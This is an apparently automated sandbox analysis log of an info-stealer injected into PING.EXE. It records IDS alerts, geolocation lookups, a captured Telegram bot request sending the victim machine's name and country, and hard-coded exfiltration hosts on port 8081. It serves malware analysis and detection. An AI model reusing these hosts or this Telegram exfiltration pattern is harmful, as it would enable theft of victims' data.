                Source: 8.2.PING.EXE.6900000.1.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:58075 version: TLS 1.2
                Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 00000008.00000002.3332146914.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdbhP source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdb source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 068DF881h8_2_068DF5DC
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 068DF0C5h8_2_068DF114
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 068DF0C5h8_2_068DEF2A
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 068DFCD9h8_2_068DFA20
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F48E28h8_2_06F48B58
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F47A5Dh8_2_06F47720
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4FC28h8_2_06F4F958
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4A9B8h8_2_06F4A6E8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F45179h8_2_06F44ED0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F47571h8_2_06F472C8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4E570h8_2_06F4E2A0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F42151h8_2_06F41EA8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F47119h8_2_06F46E70
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F44D21h8_2_06F44A78
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4C548h8_2_06F4C278
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F41CF9h8_2_06F41A50
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4A520h8_2_06F4A250
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F448C9h8_2_06F44620
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F46CC1h8_2_06F46A18
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4E0D8h8_2_06F4DE08
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F492C0h8_2_06F48FF0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4EEA0h8_2_06F4EBD0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F45E81h8_2_06F45BD8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F42E59h8_2_06F42BB0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4CE78h8_2_06F4CBA8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F45A29h8_2_06F45780
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4AE50h8_2_06F4AB80
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F42A01h8_2_06F42758
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4EA08h8_2_06F4E738
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F455D1h8_2_06F45328
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4C9E0h8_2_06F4C710
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F425A9h8_2_06F42300
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F40B99h8_2_06F408F0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4D7A8h8_2_06F4D4D8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4B780h8_2_06F4B4B0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F40741h8_2_06F40498
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F49758h8_2_06F49488
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4F338h8_2_06F4F068
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F402E9h8_2_06F40040
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4D310h8_2_06F4D040
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F462DBh8_2_06F46030
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4B2E8h8_2_06F4B018
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F432B1h8_2_06F43008
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F418A1h8_2_06F415F8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4C0B0h8_2_06F4BDE0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F46869h8_2_06F465C0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F44471h8_2_06F441C8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4A088h8_2_06F49DB8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F41449h8_2_06F411A0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4DC40h8_2_06F4D970
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F40FF1h8_2_06F40D48
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4BC18h8_2_06F4B948
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F49BF0h8_2_06F49920
                Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then jmp 06F4F7A8h8_2_06F4F500

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:58075 -> 149.154.167.220:443
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.8:58057 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2014/03/2025%20/%2013:48:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49688 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58058 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:58060 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:58063 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49685 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49691 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:58067 -> 104.21.32.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2014/03/2025%20/%2013:48:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 10:42:56 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: PING.EXE, 00000008.00000002.3328916486.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: powershell.exe, 00000002.00000002.1035865140.000001BED49E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: svchost.exe, 0000000C.00000002.2861733489.0000021948E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBC741000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBC741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004639000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004630000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a
                Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 0000000C.00000003.1208366624.0000021948C70000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                Source: PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBC968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1012766888.000001BECC7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000044A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
